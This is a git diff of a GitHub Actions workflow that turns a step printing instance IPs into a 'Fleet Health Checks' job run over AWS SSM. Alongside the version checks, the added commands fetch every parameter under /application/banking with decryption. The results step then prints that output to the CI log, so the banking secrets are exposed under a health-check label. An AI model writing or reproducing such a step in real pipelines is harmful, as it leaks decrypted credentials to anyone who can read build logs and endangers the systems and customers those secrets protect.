pipeline check 3

diff --git a/.github/workflows/test_fleet_health.yml b/.github/workflows/test_fleet_health.yml
--- a/.github/workflows/test_fleet_health.yml
+++ b/.github/workflows/test_fleet_health.yml
@@ -14,22 +14,51 @@ jobs:
     steps:
       - uses: aws-actions/configure-aws-credentials@v4
         with:
-          role-to-assume: arn:aws:iam::508375325844:role/github-actions-deploy-policy
+          role-to-assume: arn:aws:iam::508375325844:role/github-actions-deploy-role
           aws-region: us-east-1
 
-      - name: Print Private IPs
+      - name: Fleet Health Checks
+        id: health
         run: |
-          CMD=$(aws ssm send-command \
+          CMD_ID=$(aws ssm send-command \
             --targets "Key=tag:App,Values=flask" \
             --document-name "AWS-RunShellScript" \
-            --parameters '{"commands":["hostname -I"]}' \
+            --parameters '{
+              "commands": [
+                "hostname -I",
+                "docker --version 2>/dev/null || echo DOCKER NOT INSTALLED",
+                "aws --version 2>/dev/null || echo AWS CLI NOT INSTALLED",
+                "mysql --version 2>/dev/null || echo MYSQL NOT INSTALLED",
+                "aws ssm get-parameters-by-path --path /application/banking --with-decryption --region us-east-1"
+              ]
+            }' \
             --query "Command.CommandId" \
-            --output text)
+            --output text \
+            --region us-east-1)
 
-          sleep 30
+          echo "cmd_id=$CMD_ID" >> "$GITHUB_OUTPUT"
+
+      - name: Show Results
+        run: |
+          sleep 20
 
           aws ssm list-command-invocations \
-            --command-id "$CMD" \
+            --command-id "${{ steps.health.outputs.cmd_id }}" \
             --details \
-            --query "CommandInvocations[*].{Instance:InstanceId,IP:CommandPlugins[*].Output}" \
-            --output table
+            --region us-east-1 \
+            --query "CommandInvocations[*].{Instance:InstanceId,Status:Status,IP:CommandPlugins[0].Output}" \
+            --output text
+
+          FAILED=$(aws ssm list-command-invocations \
+            --command-id "${{ steps.health.outputs.cmd_id }}" \
+            --details \
+            --query "length(CommandInvocations[?Status=='Failed'])" \
+            --output text \
+            --region us-east-1)
+
+          if [ "$FAILED" -gt 0 ]; then
+            echo "::error::Health Check Failed on $FAILED instances"
+            exit 1
+          fi
+
+          echo "ALL Instances Healthy ✅"
